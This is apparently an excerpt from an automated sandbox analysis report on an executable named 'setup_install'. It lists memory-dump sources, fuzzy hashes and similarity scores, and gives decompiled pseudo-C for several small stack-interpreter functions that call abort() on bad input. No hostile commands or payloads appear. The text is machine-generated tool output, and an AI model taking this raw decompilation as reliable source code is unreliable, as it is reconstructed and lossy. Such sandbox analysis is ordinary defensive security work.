abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: db1326d617605b5493eb5285b929bddbdeb9ca695563e1b0cc06f5d077565237
Instruction ID: 6c7fe1305be61214ed1d3814b3217514e43ab79ef2189fecbccda49e1f3a1171
Opcode Fuzzy Hash: db1326d617605b5493eb5285b929bddbdeb9ca695563e1b0cc06f5d077565237
Instruction Fuzzy Hash: 7AE0D871E0610386C320EF36814017BB2F6AA82788F145C7FF446B3641DA34DC01C59F

Uniqueness

Uniqueness Score: -1.00%

Function 0040E610, Relevance: 19.5, APIs: 13, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E610(signed char* __ebx) {
				signed int _t36;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				intOrPtr _t41;
				signed char* _t45;
				signed int _t47;
				signed char _t48;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				signed char* _t56;
				signed int _t58;
				void* _t60;

				_t36 =  *(_t60 + 0x14);
				if (_t36 - 2 <= 0) goto 0x498c76;
				_t47 = _t36 - 1;
				_t50 = _t36 - 2;
				_t37 = _t36 - 3;
				_t58 =  *(_t60 + 0x30 + _t50 * 4);
				_t52 =  *(_t60 + 0x30 + _t37 * 4);
				 *(_t60 + 0x30 + _t47 * 4) = _t58;
				 *(_t60 + 0x30 + _t50 * 4) = _t52;
				 *(_t60 + 0x30 + _t37 * 4) =  *(_t60 + 0x30 + _t47 * 4);
				_t56 = __ebx;
				while( *((intOrPtr*)(_t60 + 0x18)) > _t56) {
					_t38 =  *_t56 & 0x000000ff;
					_t22 =  &(_t56[1]); // 0x1
					_t45 = _t22;
					_t48 = _t38 - 3;
					_t51 = _t38;
					if(_t48 > 0xee) {
						goto L7;
					} else {
						goto ( *((intOrPtr*)(0x4a4bd0 + (_t48 & 0x000000ff) * 4)));
					}
					do {
						goto L7;
						L10:
					} while (_t51 != 0x19);
					_t56 = _t45;
					_t52 = (_t52 ^ _t52 >> 0x0000001f) - (_t52 >> 0x1f);
					L3:
					if (_t58 - 0x3f > 0) goto 0x498c76;
					 *(_t60 + 0x30 + _t58 * 4) = _t52;
					 *(_t60 + 0x14) = _t58 + 1;
					continue;
					L7:
					abort();
					if(_t51 != 6) {
						goto L10;
					} else {
						_t52 =  *_t52;
						_t56 = _t45;
						goto L3;
					}
					L12:
				}
				_t40 =  *(_t60 + 0x14);
				if (_t40 == 0) goto 0x498c76;
				_t41 =  *((intOrPtr*)(_t60 + 0x2c + _t40 * 4));
				return _t41;
				goto L12;
			}

0x0040e610
0x0040e617
0x0040e61d
0x0040e620
0x0040e623
0x0040e62a
0x0040e62e
0x0040e632
0x0040e636
0x0040e63a
0x0040e63e
0x0040e234
0x0040e1f0
0x0040e1f3
0x0040e1f3
0x0040e1f6
0x0040e1f9
0x0040e1fe
0x00000000
0x0040e204
0x0040e207
0x0040e207
0x0040e6b9
0x00000000
0x0040e6d0
0x0040e6d0
0x0040e6d7
0x0040e6de
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x00000000
0x0040e6b9
0x0040e6b9
0x0040e6c3
0x00000000
0x0040e6c5
0x0040e6c5
0x0040e6c7
0x00000000
0x0040e6c7
0x00000000
0x0040e6c3
0x0040e23a
0x0040e240
0x0040e246
0x0040e254
0x00000000

APIs

abort.MSVCRT ref: 00498C76
abort.MSVCRT ref: 00498C7B
abort.MSVCRT ref: 00498C80
abort.MSVCRT(0040F34B), ref: 00498C85
abort.MSVCRT(0040F34B), ref: 00498C8A
abort.MSVCRT(0040F34B), ref: 00498C8F
abort.MSVCRT(0040F34B), ref: 00498C94
abort.MSVCRT(0040F34B), ref: 00498C99
abort.MSVCRT(0040F34B), ref: 00498C9E
abort.MSVCRT(0040F34B), ref: 00498CA3
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9df3cc0b1bba3c511663aa9250d0f352d171e6e8eee82ef31e040a51629eb051
Instruction ID: 932ea413acf26adf26efef629a8a701cebea97bb6232630b7d96853858970ae3
Opcode Fuzzy Hash: 9df3cc0b1bba3c511663aa9250d0f352d171e6e8eee82ef31e040a51629eb051
Instruction Fuzzy Hash: 6FE0307085A3068BC241FF19A08806AF3F5FAC6348F6529AEE54073214C734E410CA8B

Uniqueness

Uniqueness Score: -1.00%

Function 0040E449, Relevance: 19.5, APIs: 13, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E449(void* __esi) {
				void* _t22;
				signed int _t25;
				signed int _t28;
				intOrPtr _t29;
				signed char* _t30;
				signed int _t32;
				signed char _t33;
				signed int _t36;
				signed int _t37;
				signed char* _t41;
				signed int _t43;
				void* _t45;

				_t43 =  *(_t45 + 0x14);
				_t32 =  *(__esi + 1) & 0x000000ff;
				_t22 = _t43 - 1;
				if (_t32 - _t22 >= 0) goto 0x498c76;
				_t41 = __esi + 2;
				_t37 =  *(_t45 + 0x30 + (_t22 - _t32) * 4);
				while(1) {
					if (_t43 - 0x3f > 0) goto 0x498c76;
					 *(_t45 + 0x30 + _t43 * 4) = _t37;
					 *(_t45 + 0x14) = _t43 + 1;
					L4:
					if( *((intOrPtr*)(_t45 + 0x18)) > _t41) {
						_t25 =  *_t41 & 0x000000ff;
						_t8 =  &(_t41[1]); // 0x1
						_t30 = _t8;
						_t33 = _t25 - 3;
						_t36 = _t25;
						if(_t33 > 0xee) {
							goto L7;
						} else {
							goto ( *((intOrPtr*)(0x4a4bd0 + (_t33 & 0x000000ff) * 4)));
						}
						do {
							goto L7;
							L10:
						} while (_t36 != 0x19);
						_t41 = _t30;
						_t37 = (_t37 ^ _t37 >> 0x0000001f) - (_t37 >> 0x1f);
						while(1) {
							if (_t43 - 0x3f > 0) goto 0x498c76;
							 *(_t45 + 0x30 + _t43 * 4) = _t37;
							 *(_t45 + 0x14) = _t43 + 1;
							goto L4;
						}
						L7:
						abort();
						if(_t36 != 6) {
							goto L10;
						} else {
							_t37 =  *_t37;
							_t41 = _t30;
							continue;
						}
						L12:
					}
					_t28 =  *(_t45 + 0x14);
					if (_t28 == 0) goto 0x498c76;
					_t29 =  *((intOrPtr*)(_t45 + 0x2c + _t28 * 4));
					return _t29;
					goto L12;
				}
			}

0x0040e450
0x0040e454
0x0040e45b
0x0040e460
0x0040e468
0x0040e46a
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x0040e234
0x0040e238
0x0040e1f0
0x0040e1f3
0x0040e1f3
0x0040e1f6
0x0040e1f9
0x0040e1fe
0x00000000
0x0040e204
0x0040e207
0x0040e207
0x0040e6b9
0x00000000
0x0040e6d0
0x0040e6d0
0x0040e6d7
0x0040e6de
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x00000000
0x0040e230
0x0040e6b9
0x0040e6b9
0x0040e6c3
0x00000000
0x0040e6c5
0x0040e6c5
0x0040e6c7
0x00000000
0x0040e6c7
0x00000000
0x0040e6c3
0x0040e23a
0x0040e240
0x0040e246
0x0040e254
0x00000000
0x0040e254

APIs

abort.MSVCRT ref: 00498C76
abort.MSVCRT ref: 00498C7B
abort.MSVCRT ref: 00498C80
abort.MSVCRT(0040F34B), ref: 00498C85
abort.MSVCRT(0040F34B), ref: 00498C8A
abort.MSVCRT(0040F34B), ref: 00498C8F
abort.MSVCRT(0040F34B), ref: 00498C94
abort.MSVCRT(0040F34B), ref: 00498C99
abort.MSVCRT(0040F34B), ref: 00498C9E
abort.MSVCRT(0040F34B), ref: 00498CA3
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 103bd361bac9f6d586c81abd8060ad5e8eb35768a97bc2fc944dcb269b2da901
Instruction ID: 2c8fb747ac5aea1c575278a95ce8547d14f43e777b0b3e24bdd905d00fe7eada
Opcode Fuzzy Hash: 103bd361bac9f6d586c81abd8060ad5e8eb35768a97bc2fc944dcb269b2da901
Instruction Fuzzy Hash: DAE08670C0960696C714EF2690405B9F7F6AF4734CF106C6FF455B3811D324FA02865E

Uniqueness

Uniqueness Score: -1.00%

Function 0040E645, Relevance: 19.5, APIs: 13, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E645(signed char* __ebx) {
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				intOrPtr _t34;
				signed char* _t38;
				signed char _t41;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed char* _t49;
				signed int _t51;
				void* _t53;

				_t29 =  *(_t53 + 0x14);
				if (_t29 - 1 <= 0) goto 0x498c76;
				_t43 = _t29 - 1;
				_t30 = _t29 - 2;
				 *((intOrPtr*)(_t53 + 0x30 + _t43 * 4)) =  *((intOrPtr*)(_t53 + 0x30 + _t30 * 4));
				_t49 = __ebx;
				 *((intOrPtr*)(_t53 + 0x30 + _t30 * 4)) =  *((intOrPtr*)(_t53 + 0x30 + _t43 * 4));
				while( *((intOrPtr*)(_t53 + 0x18)) > _t49) {
					_t31 =  *_t49 & 0x000000ff;
					_t15 =  &(_t49[1]); // 0x1
					_t38 = _t15;
					_t41 = _t31 - 3;
					_t44 = _t31;
					if(_t41 > 0xee) {
						goto L7;
					} else {
						goto ( *((intOrPtr*)(0x4a4bd0 + (_t41 & 0x000000ff) * 4)));
					}
					do {
						goto L7;
						L10:
					} while (_t44 != 0x19);
					_t49 = _t38;
					_t45 = (_t45 ^ _t45 >> 0x0000001f) - (_t45 >> 0x1f);
					L3:
					if (_t51 - 0x3f > 0) goto 0x498c76;
					 *(_t53 + 0x30 + _t51 * 4) = _t45;
					 *(_t53 + 0x14) = _t51 + 1;
					continue;
					L7:
					abort();
					if(_t44 != 6) {
						goto L10;
					} else {
						_t45 =  *_t45;
						_t49 = _t38;
						goto L3;
					}
					L12:
				}
				_t33 =  *(_t53 + 0x14);
				if (_t33 == 0) goto 0x498c76;
				_t34 =  *((intOrPtr*)(_t53 + 0x2c + _t33 * 4));
				return _t34;
				goto L12;
			}

0x0040e645
0x0040e64c
0x0040e652
0x0040e655
0x0040e660
0x0040e664
0x0040e666
0x0040e234
0x0040e1f0
0x0040e1f3
0x0040e1f3
0x0040e1f6
0x0040e1f9
0x0040e1fe
0x00000000
0x0040e204
0x0040e207
0x0040e207
0x0040e6b9
0x00000000
0x0040e6d0
0x0040e6d0
0x0040e6d7
0x0040e6de
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x00000000
0x0040e6b9
0x0040e6b9
0x0040e6c3
0x00000000
0x0040e6c5
0x0040e6c5
0x0040e6c7
0x00000000
0x0040e6c7
0x00000000
0x0040e6c3
0x0040e23a
0x0040e240
0x0040e246
0x0040e254
0x00000000

APIs

abort.MSVCRT ref: 00498C76
abort.MSVCRT ref: 00498C7B
abort.MSVCRT ref: 00498C80
abort.MSVCRT(0040F34B), ref: 00498C85
abort.MSVCRT(0040F34B), ref: 00498C8A
abort.MSVCRT(0040F34B), ref: 00498C8F
abort.MSVCRT(0040F34B), ref: 00498C94
abort.MSVCRT(0040F34B), ref: 00498C99
abort.MSVCRT(0040F34B), ref: 00498C9E
abort.MSVCRT(0040F34B), ref: 00498CA3
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ac3f3daff8488f3ee8d149a8aa1ff6fcca5e082ad4e3aff1064916e08a160c53
Instruction ID: 00d35308614a7f1a091cc4fcb2960dae118613037b64a51f995b6a9d3981871d
Opcode Fuzzy Hash: ac3f3daff8488f3ee8d149a8aa1ff6fcca5e082ad4e3aff1064916e08a160c53
Instruction Fuzzy Hash: 34E04FB096A2028BC250FF19A188069F3B6FAC6744F5429AFE440B3214C725E8108A8B

Uniqueness

Uniqueness Score: -1.00%

Function 0040E48C, Relevance: 19.5, APIs: 13, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E48C(signed char* __ebx) {
				signed int _t17;
				signed int _t19;
				signed int _t21;
				intOrPtr _t22;
				signed char* _t26;
				signed char _t28;
				signed int _t30;
				signed int _t31;
				signed char* _t34;
				signed int _t36;
				void* _t38;

				_t17 =  *(_t38 + 0x14);
				if (_t17 == 0) goto 0x498c76;
				_t34 = __ebx;
				 *(_t38 + 0x14) = _t17 - 1;
				while( *((intOrPtr*)(_t38 + 0x18)) > _t34) {
					_t19 =  *_t34 & 0x000000ff;
					_t3 =  &(_t34[1]); // 0x1
					_t26 = _t3;
					_t28 = _t19 - 3;
					_t30 = _t19;
					if(_t28 > 0xee) {
						goto L7;
					} else {
						goto ( *((intOrPtr*)(0x4a4bd0 + (_t28 & 0x000000ff) * 4)));
					}
					do {
						goto L7;
						L10:
					} while (_t30 != 0x19);
					_t34 = _t26;
					_t31 = (_t31 ^ _t31 >> 0x0000001f) - (_t31 >> 0x1f);
					L3:
					if (_t36 - 0x3f > 0) goto 0x498c76;
					 *(_t38 + 0x30 + _t36 * 4) = _t31;
					 *(_t38 + 0x14) = _t36 + 1;
					continue;
					L7:
					abort();
					if(_t30 != 6) {
						goto L10;
					} else {
						_t31 =  *_t31;
						_t34 = _t26;
						goto L3;
					}
					L12:
				}
				_t21 =  *(_t38 + 0x14);
				if (_t21 == 0) goto 0x498c76;
				_t22 =  *((intOrPtr*)(_t38 + 0x2c + _t21 * 4));
				return _t22;
				goto L12;
			}

0x0040e490
0x0040e496
0x0040e49f
0x0040e4a1
0x0040e234
0x0040e1f0
0x0040e1f3
0x0040e1f3
0x0040e1f6
0x0040e1f9
0x0040e1fe
0x00000000
0x0040e204
0x0040e207
0x0040e207
0x0040e6b9
0x00000000
0x0040e6d0
0x0040e6d0
0x0040e6d7
0x0040e6de
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x00000000
0x0040e6b9
0x0040e6b9
0x0040e6c3
0x00000000
0x0040e6c5
0x0040e6c5
0x0040e6c7
0x00000000
0x0040e6c7
0x00000000
0x0040e6c3
0x0040e23a
0x0040e240
0x0040e246
0x0040e254
0x00000000

APIs

abort.MSVCRT ref: 00498C76
abort.MSVCRT ref: 00498C7B
abort.MSVCRT ref: 00498C80
abort.MSVCRT(0040F34B), ref: 00498C85
abort.MSVCRT(0040F34B), ref: 00498C8A
abort.MSVCRT(0040F34B), ref: 00498C8F
abort.MSVCRT(0040F34B), ref: 00498C94
abort.MSVCRT(0040F34B), ref: 00498C99
abort.MSVCRT(0040F34B), ref: 00498C9E
abort.MSVCRT(0040F34B), ref: 00498CA3
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 8982a9da220e3e4cf1677eebd09b125f048a541bd6b194bec17806968d6f3f50
Instruction ID: a28e7627cbd7acd376d836f4e3fea0dc26716b583dedae1e8e9832f6e21fd258
Opcode Fuzzy Hash: 8982a9da220e3e4cf1677eebd09b125f048a541bd6b194bec17806968d6f3f50
Instruction Fuzzy Hash: 77D0A7B0D06203968210EF364140076F1F4FA4778CF40286FF445B3911C628D90085AF

Uniqueness

Uniqueness Score: -1.00%

Function 0040E473, Relevance: 19.5, APIs: 13, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E473(signed char* __ebx) {
				signed int _t20;
				signed int _t23;
				intOrPtr _t24;
				signed char* _t26;
				signed char _t28;
				signed int _t30;
				signed int _t31;
				signed char* _t34;
				signed int _t36;
				void* _t38;

				_t36 =  *(_t38 + 0x14);
				if (_t36 - 1 <= 0) goto 0x498c76;
				_t31 =  *(_t38 + 0x28 + _t36 * 4);
				_t34 = __ebx;
				while(1) {
					if (_t36 - 0x3f > 0) goto 0x498c76;
					 *(_t38 + 0x30 + _t36 * 4) = _t31;
					 *(_t38 + 0x14) = _t36 + 1;
					L4:
					if( *((intOrPtr*)(_t38 + 0x18)) > _t34) {
						_t20 =  *_t34 & 0x000000ff;
						_t5 =  &(_t34[1]); // 0x1
						_t26 = _t5;
						_t28 = _t20 - 3;
						_t30 = _t20;
						if(_t28 > 0xee) {
							goto L7;
						} else {
							goto ( *((intOrPtr*)(0x4a4bd0 + (_t28 & 0x000000ff) * 4)));
						}
						do {
							goto L7;
							L10:
						} while (_t30 != 0x19);
						_t34 = _t26;
						_t31 = (_t31 ^ _t31 >> 0x0000001f) - (_t31 >> 0x1f);
						while(1) {
							if (_t36 - 0x3f > 0) goto 0x498c76;
							 *(_t38 + 0x30 + _t36 * 4) = _t31;
							 *(_t38 + 0x14) = _t36 + 1;
							goto L4;
						}
						L7:
						abort();
						if(_t30 != 6) {
							goto L10;
						} else {
							_t31 =  *_t31;
							_t34 = _t26;
							continue;
						}
						L12:
					}
					_t23 =  *(_t38 + 0x14);
					if (_t23 == 0) goto 0x498c76;
					_t24 =  *((intOrPtr*)(_t38 + 0x2c + _t23 * 4));
					return _t24;
					goto L12;
				}
			}

0x0040e473
0x0040e47a
0x0040e480
0x0040e484
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x0040e234
0x0040e238
0x0040e1f0
0x0040e1f3
0x0040e1f3
0x0040e1f6
0x0040e1f9
0x0040e1fe
0x00000000
0x0040e204
0x0040e207
0x0040e207
0x0040e6b9
0x00000000
0x0040e6d0
0x0040e6d0
0x0040e6d7
0x0040e6de
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x00000000
0x0040e230
0x0040e6b9
0x0040e6b9
0x0040e6c3
0x00000000
0x0040e6c5
0x0040e6c5
0x0040e6c7
0x00000000
0x0040e6c7
0x00000000
0x0040e6c3
0x0040e23a
0x0040e240
0x0040e246
0x0040e254
0x00000000
0x0040e254

APIs

abort.MSVCRT ref: 00498C76
abort.MSVCRT ref: 00498C7B
abort.MSVCRT ref: 00498C80
abort.MSVCRT(0040F34B), ref: 00498C85
abort.MSVCRT(0040F34B), ref: 00498C8A
abort.MSVCRT(0040F34B), ref: 00498C8F
abort.MSVCRT(0040F34B), ref: 00498C94
abort.MSVCRT(0040F34B), ref: 00498C99
abort.MSVCRT(0040F34B), ref: 00498C9E
abort.MSVCRT(0040F34B), ref: 00498CA3
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 7808f7096d3576ca5aaebf3b7e00e302c6b96eaf2d10c2e7d80afaffd1d386bf
Instruction ID: 2d1a9bce87cef88fb94b0981d57a42e381f0ee930295cef678b0eb94d26a1b45
Opcode Fuzzy Hash: 7808f7096d3576ca5aaebf3b7e00e302c6b96eaf2d10c2e7d80afaffd1d386bf
Instruction Fuzzy Hash: F3D012B0C4A309568110BF551141079F2B7A9877ADF553D2FF400335725A2DDD81859F

Uniqueness

Uniqueness Score: -1.00%

Function 0040E4B0, Relevance: 19.5, APIs: 13, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E4B0(signed char* __ebx) {
				signed int _t20;
				signed int _t23;
				intOrPtr _t24;
				signed char* _t26;
				signed char _t28;
				signed int _t30;
				signed int _t31;
				signed char* _t34;
				signed int _t36;
				void* _t38;

				_t36 =  *(_t38 + 0x14);
				if (_t36 == 0) goto 0x498c76;
				_t31 =  *(_t38 + 0x2c + _t36 * 4);
				_t34 = __ebx;
				while(1) {
					if (_t36 - 0x3f > 0) goto 0x498c76;
					 *(_t38 + 0x30 + _t36 * 4) = _t31;
					 *(_t38 + 0x14) = _t36 + 1;
					L4:
					if( *((intOrPtr*)(_t38 + 0x18)) > _t34) {
						_t20 =  *_t34 & 0x000000ff;
						_t5 =  &(_t34[1]); // 0x1
						_t26 = _t5;
						_t28 = _t20 - 3;
						_t30 = _t20;
						if(_t28 > 0xee) {
							goto L7;
						} else {
							goto ( *((intOrPtr*)(0x4a4bd0 + (_t28 & 0x000000ff) * 4)));
						}
						do {
							goto L7;
							L10:
						} while (_t30 != 0x19);
						_t34 = _t26;
						_t31 = (_t31 ^ _t31 >> 0x0000001f) - (_t31 >> 0x1f);
						while(1) {
							if (_t36 - 0x3f > 0) goto 0x498c76;
							 *(_t38 + 0x30 + _t36 * 4) = _t31;
							 *(_t38 + 0x14) = _t36 + 1;
							goto L4;
						}
						L7:
						abort();
						if(_t30 != 6) {
							goto L10;
						} else {
							_t31 =  *_t31;
							_t34 = _t26;
							continue;
						}
						L12:
					}
					_t23 =  *(_t38 + 0x14);
					if (_t23 == 0) goto 0x498c76;
					_t24 =  *((intOrPtr*)(_t38 + 0x2c + _t23 * 4));
					return _t24;
					goto L12;
				}
			}

0x0040e4b0
0x0040e4b6
0x0040e4bc
0x0040e4c0
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x0040e234
0x0040e238
0x0040e1f0
0x0040e1f3
0x0040e1f3
0x0040e1f6
0x0040e1f9
0x0040e1fe
0x00000000
0x0040e204
0x0040e207
0x0040e207
0x0040e6b9
0x00000000
0x0040e6d0
0x0040e6d0
0x0040e6d7
0x0040e6de
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x00000000
0x0040e230
0x0040e6b9
0x0040e6b9
0x0040e6c3
0x00000000
0x0040e6c5
0x0040e6c5
0x0040e6c7
0x00000000
0x0040e6c7
0x00000000
0x0040e6c3
0x0040e23a
0x0040e240
0x0040e246
0x0040e254
0x00000000
0x0040e254

APIs

abort.MSVCRT ref: 00498C76
abort.MSVCRT ref: 00498C7B
abort.MSVCRT ref: 00498C80
abort.MSVCRT(0040F34B), ref: 00498C85
abort.MSVCRT(0040F34B), ref: 00498C8A
abort.MSVCRT(0040F34B), ref: 00498C8F
abort.MSVCRT(0040F34B), ref: 00498C94
abort.MSVCRT(0040F34B), ref: 00498C99
abort.MSVCRT(0040F34B), ref: 00498C9E
abort.MSVCRT(0040F34B), ref: 00498CA3
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: b5d1085c61586cc53c6ff2cc92c1f2903ecd24412c8ecbe175a9e58d841ed20c
Instruction ID: 0764c32e7d8412d2659f5b6eb4e9bb6fc3b9deddeb2cff56eab357dcd430ad01
Opcode Fuzzy Hash: b5d1085c61586cc53c6ff2cc92c1f2903ecd24412c8ecbe175a9e58d841ed20c
